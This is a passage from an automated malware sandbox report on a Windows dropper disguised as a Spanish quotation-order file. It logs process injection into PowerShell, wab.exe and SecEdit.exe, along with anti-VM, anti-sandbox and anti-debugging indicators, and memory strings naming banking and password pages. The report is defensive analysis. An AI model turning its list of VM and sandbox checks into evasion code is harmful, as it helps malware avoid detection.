            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe PID: 7448, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
            Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
            Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
            Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
            Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
            Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
            Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
            Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeMemory allocated: 23E068B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeMemory allocated: 23E20420000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369D1C0 rdtsc 4_2_0369D1C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8155Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1516Jump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeWindow / User API: threadDelayed 3255Jump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeWindow / User API: threadDelayed 6717Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 0.9 %
            Source: C:\Windows\SysWOW64\SecEdit.exeAPI coverage: 3.3 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exe TID: 8148Thread sleep count: 3255 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exe TID: 8148Thread sleep time: -6510000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exe TID: 8148Thread sleep count: 6717 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exe TID: 8148Thread sleep time: -13434000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe TID: 7260Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe TID: 7260Thread sleep time: -43500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe TID: 7260Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe TID: 7260Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\SecEdit.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\SecEdit.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058BC80 FindFirstFileW,FindNextFileW,FindClose,12_2_0058BC80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 1150d71.12.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: 1150d71.12.drBinary or memory string: tasks.office.comVMware20,11696501413o
            Source: Amcache.hve.8.drBinary or memory string: VMware
            Source: 1150d71.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: 1150d71.12.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: 1150d71.12.drBinary or memory string: dev.azure.comVMware20,11696501413j
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: 1150d71.12.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: 1150d71.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
            Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: 1150d71.12.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: 1150d71.12.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: 1150d71.12.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: firefox.exe, 00000013.00000002.1889026777.00000255DF8EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
            Source: Amcache.hve.8.drBinary or memory string: vmci.sys
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: Amcache.hve.8.drBinary or memory string: VMware20,1
            Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: 1150d71.12.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: 1150d71.12.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
            Source: 1150d71.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
            Source: 1150d71.12.drBinary or memory string: outlook.office365.comVMware20,11696501413t
            Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: 1150d71.12.drBinary or memory string: interactiveuserers.comVMware20,11696501413
            Source: 1150d71.12.drBinary or memory string: AMC password management pageVMware20,11696501413
            Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: wab.exe, 0000000F.00000002.1667587369.00000000034C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&l
            Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
            Source: 1150d71.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: 1150d71.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: 1150d71.12.drBinary or memory string: bankofamerica.comVMware20,11696501413x
            Source: 1150d71.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: 1150d71.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792104250.000000000119F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
            Source: 1150d71.12.drBinary or memory string: outlook.office.comVMware20,11696501413s
            Source: 1150d71.12.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: wab.exe, 00000011.00000002.1747546615.0000000002CF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
            Source: 1150d71.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: 1150d71.12.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: 1150d71.12.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
            Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: 1150d71.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: 1150d71.12.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: 1150d71.12.drBinary or memory string: global block list test formVMware20,11696501413
            Source: 1150d71.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: 1150d71.12.drBinary or memory string: discord.comVMware20,11696501413f
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369D1C0 rdtsc 4_2_0369D1C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00417553 LdrLoadDll,4_2_00417553
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DF367 mov eax, dword ptr fs:[00000030h]4_2_036DF367
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036C437C mov eax, dword ptr fs:[00000030h]4_2_036C437C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03627370 mov eax, dword ptr fs:[00000030h]4_2_03627370
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03627370 mov eax, dword ptr fs:[00000030h]4_2_03627370
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03627370 mov eax, dword ptr fs:[00000030h]4_2_03627370
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A2349 mov eax, dword ptr fs:[00000030h]4_2_036A2349
